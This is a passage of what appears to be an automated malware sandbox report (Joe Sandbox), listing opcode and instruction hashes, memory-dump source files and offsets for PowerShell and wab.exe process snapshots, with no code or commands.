                                                                                                • Instruction ID: 39ef80d3032631d9fa6b2d44052b4f4098ae15a80c6e32265b19b1ae2e6dd2e8
                                                                                                • Opcode Fuzzy Hash: bf13e3136846d864e4dc556291cd14dbdfa94bb5590eda5390e4366a62a0e7fe
                                                                                                • Instruction Fuzzy Hash: 64918F34A052449FC715EFA9D444AAEFBF2FF89310F1485A9E8459B361CB35EC86CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: db4d9ac0e19eacbe333779ae23a524c53166af4bc59d5ab67d397dfdd21b834b
                                                                                                • Instruction ID: 407c0ad3c9fb89f3b321a993b27adbf02042b839d372bc32d53cc193649b9c82
                                                                                                • Opcode Fuzzy Hash: db4d9ac0e19eacbe333779ae23a524c53166af4bc59d5ab67d397dfdd21b834b
                                                                                                • Instruction Fuzzy Hash: 20916874A01645CFCB09CF59C494AAAFBB1FF89310B24869AD955AB3A5C335FC41CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 60b5e96ad4d9fc1dd9812506b9778aa76a43740aa5d9a7baad286279c4f76cfd
                                                                                                • Instruction ID: a41c9eb0a5f90f300201fe585a5c586b60857da6f7bea59df91db6e64c599ddc
                                                                                                • Opcode Fuzzy Hash: 60b5e96ad4d9fc1dd9812506b9778aa76a43740aa5d9a7baad286279c4f76cfd
                                                                                                • Instruction Fuzzy Hash: 63818DB4A04205DFCB14DF58D484A99BBB2FF89314F14C8A9E914AB395C732EC81DFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2df9d8ee5eb1e315020796529aa268ec18e68ebf374f79b8eab9da9d46b072fb
                                                                                                • Instruction ID: a5ae1b424f35397c514fb684694f4e4da3732f6cb6f67f3e8aabfb200a84bd96
                                                                                                • Opcode Fuzzy Hash: 2df9d8ee5eb1e315020796529aa268ec18e68ebf374f79b8eab9da9d46b072fb
                                                                                                • Instruction Fuzzy Hash: CD718D70A00209CFDB14DF68D884A9EFBF2FF85354F1485A9D455AB661DB70A84ACF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74bd879c2d69a6d16b7055edbca46faab66e2baa2c8165ee78e15d90459404e6
                                                                                                • Instruction ID: 37001e0aa1c15544501808d669dc6675449b6b3e73965522d63133ebfcf189e0
                                                                                                • Opcode Fuzzy Hash: 74bd879c2d69a6d16b7055edbca46faab66e2baa2c8165ee78e15d90459404e6
                                                                                                • Instruction Fuzzy Hash: D8712970A00248DFDB15DFA5D484BADBBB2FF88304F148469D802AB7A4DB75AD49CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4b48fcd628cef263e2aa663714b9d01254303e0c6c812b8df51aad70ae71f7c7
                                                                                                • Instruction ID: 6f848fc55d0409484397c3e962253bf7a296d7ffd8f1653692328c2014a83dbe
                                                                                                • Opcode Fuzzy Hash: 4b48fcd628cef263e2aa663714b9d01254303e0c6c812b8df51aad70ae71f7c7
                                                                                                • Instruction Fuzzy Hash: B4515EB0A00209DFDB14DFA5D8847ADFBB2FF85304F148469D506AB6A4DBB4AC49CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0e40728bc57558e4c9a970f9e4996f45db93a59c90efd5006482fc338f24dbf
                                                                                                • Instruction ID: 7c8a4c069057475fde1007ff9e8545ff6b7a573712f277831d37b3301b193667
                                                                                                • Opcode Fuzzy Hash: b0e40728bc57558e4c9a970f9e4996f45db93a59c90efd5006482fc338f24dbf
                                                                                                • Instruction Fuzzy Hash: E441F2F161D3429FDB216B34A4503B97F61AFD6740F040CAAD960CB2D6D7258985D3E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7d8d357b7f3bfd1310676e4643e3a14ee35bde41afe5cd34936c7046ef87f907
                                                                                                • Instruction ID: 6b56d386317cb0ddddb2f6fcf92043543fc905560dc4a2c5b2c67d7f9d772de0
                                                                                                • Opcode Fuzzy Hash: 7d8d357b7f3bfd1310676e4643e3a14ee35bde41afe5cd34936c7046ef87f907
                                                                                                • Instruction Fuzzy Hash: 85415171600204CFDB24DF64D458BAEBBB2FF89754F1984A8D906EB7A4CB74AC49CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4340648ea2c851a8f5d69264490fbbaaf00924435425f5c74796cad71f63117
                                                                                                • Instruction ID: 890e131addf378477f1066c4942b2193292445487feae7d1f6401d6beb956dc0
                                                                                                • Opcode Fuzzy Hash: c4340648ea2c851a8f5d69264490fbbaaf00924435425f5c74796cad71f63117
                                                                                                • Instruction Fuzzy Hash: ED413471A093859FCB128B64D854B66BFB1AF86310F18888FD554DF292C731DC46C7A2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6117fb327de3a0d13dc58669c07b885115c001248d43c5c00976b60d08fe490f
                                                                                                • Instruction ID: 45224c8f8b45bd586d349595447060dd783c2639b51e24badb728885b5b788af
                                                                                                • Opcode Fuzzy Hash: 6117fb327de3a0d13dc58669c07b885115c001248d43c5c00976b60d08fe490f
                                                                                                • Instruction Fuzzy Hash: 0531B570B40214AFD70497A8C854BAE7BA3AFC4740F10C418EA51AF791CF76EC468BE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6776c7d9b9fe58973dc78babf2a2e13b528806fce6828668977bde001bf440ab
                                                                                                • Instruction ID: b20b89286e53e0784871709f2542fe9e2bf5c2055e3c21046de45ede52d5a822
                                                                                                • Opcode Fuzzy Hash: 6776c7d9b9fe58973dc78babf2a2e13b528806fce6828668977bde001bf440ab
                                                                                                • Instruction Fuzzy Hash: C131FF70A01349DFC715EF78D44069EBFB2EFC6320F1086AED5859B2A1DB30AA45CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5a7e01c757747842616e84b93a4d073f37475a9533acea95157c38efdf20baf2
                                                                                                • Instruction ID: 3c7a2f19411ba9f6481c5c4a8f3a34f748ea165500c81412491429065a57a9e7
                                                                                                • Opcode Fuzzy Hash: 5a7e01c757747842616e84b93a4d073f37475a9533acea95157c38efdf20baf2
                                                                                                • Instruction Fuzzy Hash: B0211AB4A042199FCB00DF98D490AAEFBB5FB89310B158199D915EB352C735FD41CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2629422874.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2bd4d1cc69af7875dd9a9abb4d46161ae91ef26330e508c6832d9e516837206a
                                                                                                • Instruction ID: c531d5db3cb6b44497d5219ebff9ea0f784c8460bf61f9cb5d3b0ce9abcef23b
                                                                                                • Opcode Fuzzy Hash: 2bd4d1cc69af7875dd9a9abb4d46161ae91ef26330e508c6832d9e516837206a
                                                                                                • Instruction Fuzzy Hash: 28117FB97092868FD7118B14E840B63BB76AFC2354F1985ABD5548B2A2D7729840CBA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ccd3d3788ff8b3c28c352fed49089e53535615fc95d43f64ae735e2e54dbe0a4
                                                                                                • Instruction ID: c9b08f3889bd1907a355aef25aa5a438842f96a5ace75e33d76f9f65bff572f8
                                                                                                • Opcode Fuzzy Hash: ccd3d3788ff8b3c28c352fed49089e53535615fc95d43f64ae735e2e54dbe0a4
                                                                                                • Instruction Fuzzy Hash: 7A014F35A00209DFCB14CF9CD8809ADF7B2FF8C324B248668D919A7655C732BC52CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2617581775.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_4b50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 72c5b77db8f7adc80023d182cdd798624d8b38011e147c911252b6712ec3c628
                                                                                                • Instruction ID: 56a1d57c2e557843df2724934edddb01b99219ec9e8527a61509bf7eeb005485
                                                                                                • Opcode Fuzzy Hash: 72c5b77db8f7adc80023d182cdd798624d8b38011e147c911252b6712ec3c628
                                                                                                • Instruction Fuzzy Hash: D7F05435A00118DFCB40CBDCD8509EDF7BAFF8C320B248159E518A3265C736AC12CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3a95f9c320de82cf4bd62f62eb4fbd4e86a094fc66b1ab2c3747c7478b97715f
                                                                                                • Instruction ID: 48e350f716f2ae7b7a9e4ec379a9229cb454ee74a8d1e7723750298e63d73d7d
                                                                                                • Opcode Fuzzy Hash: 3a95f9c320de82cf4bd62f62eb4fbd4e86a094fc66b1ab2c3747c7478b97715f
                                                                                                • Instruction Fuzzy Hash: 03B13C70E00209CFDB14CFA9C9A57EEBBF2BF88704F54812AD815A7294EB749845CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 47d0944eeef170408792765b4d5d9dd92b744ab10bb528aabbe6e5523e2d7b04
                                                                                                • Instruction ID: a7f1088f6ccec5bce108c4c4b47bf0fef1ca20e54e7ac084a9bd5bb3c437feba
                                                                                                • Opcode Fuzzy Hash: 47d0944eeef170408792765b4d5d9dd92b744ab10bb528aabbe6e5523e2d7b04
                                                                                                • Instruction Fuzzy Hash: 4EB16D70E00209CFDF10CFA9D8A679EBBF6AF88714F148129D415A7298EB749855CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,l#$p
                                                                                                • API String ID: 0-3542778055
                                                                                                • Opcode ID: 6df0104ff81cfb569010cf6bc0010de5d818597834e657bc7919e827e2fd7c3d
                                                                                                • Instruction ID: 42e4d6e7c320643445a9c12170b16641328d6b1f085484886e40f329aa006826
                                                                                                • Opcode Fuzzy Hash: 6df0104ff81cfb569010cf6bc0010de5d818597834e657bc7919e827e2fd7c3d
                                                                                                • Instruction Fuzzy Hash: 2B517D74A00155CFCB14DF68C994BAEBBB2FF45304F2585A9E805AB7A6C734EC01CB61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,
                                                                                                • API String ID: 0-3772416878
                                                                                                • Opcode ID: ec66f70ec7e005095c25cf2dabc412514f000c581d7d3779621f587c00ae6886
                                                                                                • Instruction ID: 4ffb4189f2c318cb7b496389c6e83537c4b273a5068997e3e6c7d3055587c51d
                                                                                                • Opcode Fuzzy Hash: ec66f70ec7e005095c25cf2dabc412514f000c581d7d3779621f587c00ae6886
                                                                                                • Instruction Fuzzy Hash: 24028D30B002059FDB14DF64D494B6A7BF2FF88310F248A69E446AB399DFB5AC45CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Gm#
                                                                                                • API String ID: 0-750714539
                                                                                                • Opcode ID: 29fcb56694583793091c01e668e1fdf09ac988f9b2c40f5c5ac8a5a7b8decc15
                                                                                                • Instruction ID: a3b912754bfc30ce5f78c46493df2ae6e739f38a9bb4ff9ff85582d244d4f940
                                                                                                • Opcode Fuzzy Hash: 29fcb56694583793091c01e668e1fdf09ac988f9b2c40f5c5ac8a5a7b8decc15
                                                                                                • Instruction Fuzzy Hash: 1AA17F70B017058FCB59EF74D4A466DB7A2FF89304B20896AD906EB385DF789C06CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +
                                                                                                • API String ID: 0-3952988497
                                                                                                • Opcode ID: 3ace076d318d92983d6c86987ffea32b9129cc88cbb3b55ff6ad421d59ace1c2
                                                                                                • Instruction ID: a410462e5e11883b06337f8590e7b6deffa7740620036e910d1653dcb1e6a047
                                                                                                • Opcode Fuzzy Hash: 3ace076d318d92983d6c86987ffea32b9129cc88cbb3b55ff6ad421d59ace1c2
                                                                                                • Instruction Fuzzy Hash: 8391AC70D42300CFD718EFA8F4A87143BA2F7A9715F149A19D501EB285DBB49E52CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: d t
                                                                                                • API String ID: 0-2792223501
                                                                                                • Opcode ID: 3525fec23da609a1bff489ab19068047720253b45adaf9c7eb3657745244dbb8
                                                                                                • Instruction ID: c11356486c4a360f0d74ce17e0612460069b81dfcf9b10ff89a712543aa2b9a2
                                                                                                • Opcode Fuzzy Hash: 3525fec23da609a1bff489ab19068047720253b45adaf9c7eb3657745244dbb8
                                                                                                • Instruction Fuzzy Hash: 4B516F30B101148FC758DF69D498A6DBBF6EF88710F2581A9E406EB3A5CA75DC05CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: H
                                                                                                • API String ID: 0-2852464175
                                                                                                • Opcode ID: 4ae0c723cfcb80c51c3ea376581424cc82df690449bf19ad476d59d01c83da0b
                                                                                                • Instruction ID: 3e58e694a3da7df7502885b32802b014a55862714d37c1ce7b1139ca92b92871
                                                                                                • Opcode Fuzzy Hash: 4ae0c723cfcb80c51c3ea376581424cc82df690449bf19ad476d59d01c83da0b
                                                                                                • Instruction Fuzzy Hash: A921B031B501148FDB04DB68C4A8BAD7BF6AF8CB10F258199E506DB3A6CF758C05CBA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d55f7daedcaa9ad7d09582bdfe8a8e02d069f6cd7e603ab8eb8de00fa25d7dbf
                                                                                                • Instruction ID: 0a4f292ff7cc7058ea3387e2fe4592c08477d63f53a0ad71f1df0c0a698a17a8
                                                                                                • Opcode Fuzzy Hash: d55f7daedcaa9ad7d09582bdfe8a8e02d069f6cd7e603ab8eb8de00fa25d7dbf
                                                                                                • Instruction Fuzzy Hash: 11B12970E10209CFDB10CFA8C9A57DEBBF2BF88704F54812AD815A7294EB749855CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 11dc73ef9b59d63c7b15035cbd69031c58814a39d4cb49fdabf06b4d2e62e9e4
                                                                                                • Instruction ID: 120844b3793fd69f3d267fd974e2343c81e1f50462e80eaf422c69b90c2d2a5b
                                                                                                • Opcode Fuzzy Hash: 11dc73ef9b59d63c7b15035cbd69031c58814a39d4cb49fdabf06b4d2e62e9e4
                                                                                                • Instruction Fuzzy Hash: A2B17D70E10209CFDF10CFA8D8A679EBBF5BF88714F148129D815A7298EB749855CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7e3ce8c31dde82e6158c77ffc95a7b8b2ab8ce4b0dcc509d5707690c433b007e
                                                                                                • Instruction ID: eef266f5be996538db73eb11bf3e97f9348dbbdca6314efbaa8c17391662539e
                                                                                                • Opcode Fuzzy Hash: 7e3ce8c31dde82e6158c77ffc95a7b8b2ab8ce4b0dcc509d5707690c433b007e
                                                                                                • Instruction Fuzzy Hash: 2B91BD31E013168FCB15DF68C4946AFBBB2FF84310B1486A9D815AB281DB74EC46CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb97942027e164b6e4602fece1cd988936f13dc6a706810d11627122540b5f8f
                                                                                                • Instruction ID: 26835aeed959e645a43ec309bd1800a75dc58d8174415b23290f8f3ace3023a0
                                                                                                • Opcode Fuzzy Hash: fb97942027e164b6e4602fece1cd988936f13dc6a706810d11627122540b5f8f
                                                                                                • Instruction Fuzzy Hash: 1EA17D74A01241DFCB05EF70D458A6E7BB2FF88350B208A69E5029B355DFB8A956CFC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e80380853de06511c9c448155c4fb6d42630130fdc2f8d19284e06877b55bdb
                                                                                                • Instruction ID: 7907328a92fc32252ca4fa0351849df884ba0d4f060ab1bf183a8926b59c11a9
                                                                                                • Opcode Fuzzy Hash: 6e80380853de06511c9c448155c4fb6d42630130fdc2f8d19284e06877b55bdb
                                                                                                • Instruction Fuzzy Hash: 5E61AC70B402048FD718EF69E494B6A7BB2FB88310F24896DE1069B395DFB5AC45CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e03d7a2ed6b3c09506cd1e730813d048e702c5c3ba26f09bba623cc79763fca4
                                                                                                • Instruction ID: 566e61871082441c7290a9eb7bdbec3545456a5d52953b777dc2d5e212cda64d
                                                                                                • Opcode Fuzzy Hash: e03d7a2ed6b3c09506cd1e730813d048e702c5c3ba26f09bba623cc79763fca4
                                                                                                • Instruction Fuzzy Hash: 5441B271B042048FDB19DF78D498B9EBBE2AF88300F1485A9E005EB3A1CA759C05CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e93313df85d0f7b218bc7887cba6268ae2ca8e952091d3672e9713ca4af440e4
                                                                                                • Instruction ID: 9d6bda09643f701b537902a341a51cb963327eade0fc022fa80f86a47061680d
                                                                                                • Opcode Fuzzy Hash: e93313df85d0f7b218bc7887cba6268ae2ca8e952091d3672e9713ca4af440e4
                                                                                                • Instruction Fuzzy Hash: 2D516D70A40204DFEB14DF69C898B69BBB6EF4C714F248159E512AB3E2CBB5AC41CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73c576801f1eb578d02563beb0c0e81f90003156d538515e14c6bf99a62d6c4c
                                                                                                • Instruction ID: 530e25078314937d81064b8d7e6bc57e0ea52cbe289926f19f3e7a6a70038202
                                                                                                • Opcode Fuzzy Hash: 73c576801f1eb578d02563beb0c0e81f90003156d538515e14c6bf99a62d6c4c
                                                                                                • Instruction Fuzzy Hash: 65418131B003048FDB24EB7994947AEBBE6EFC4214F24846ED10A97380CF799C05CB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9548fbed5e7b61d0f6fb7da36937cd251d0404be887fb98ccc7de85bac9879c0
                                                                                                • Instruction ID: 8573545e9367bd2e2824aa726fcc55db5b6101e0d827ebffb48fe27efb054277
                                                                                                • Opcode Fuzzy Hash: 9548fbed5e7b61d0f6fb7da36937cd251d0404be887fb98ccc7de85bac9879c0
                                                                                                • Instruction Fuzzy Hash: 0051F674901202CFC785DF74E4485697B22FB8C3053A49A6CE401EB258EFF89D95CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bd1c21c25c000036e615189bded782bd10299dc82dd15fad2100873d6628e0fe
                                                                                                • Instruction ID: 18d66c3ca65ffec84a5742aaa531fe4606debb3aca95c16da895360a22292e40
                                                                                                • Opcode Fuzzy Hash: bd1c21c25c000036e615189bded782bd10299dc82dd15fad2100873d6628e0fe
                                                                                                • Instruction Fuzzy Hash: D541A334A08541CFC3696B5994A872CBB7ABF857053388599E0068B6DBCB35DC23CFA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5aa5658591abd3bd861f371436a22381d4216b2b433ec9e760c25b6d763a2693
                                                                                                • Instruction ID: 30862d27370a937398b5f2d282372bab8bf1355b7470488292ea212333ec29c2
                                                                                                • Opcode Fuzzy Hash: 5aa5658591abd3bd861f371436a22381d4216b2b433ec9e760c25b6d763a2693
                                                                                                • Instruction Fuzzy Hash: 27418D71E00209AFCB44EBF9C45466EBBFAFFC8310F248669D449D7346DA349D428BA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.3337233111.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_2300000_wab.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
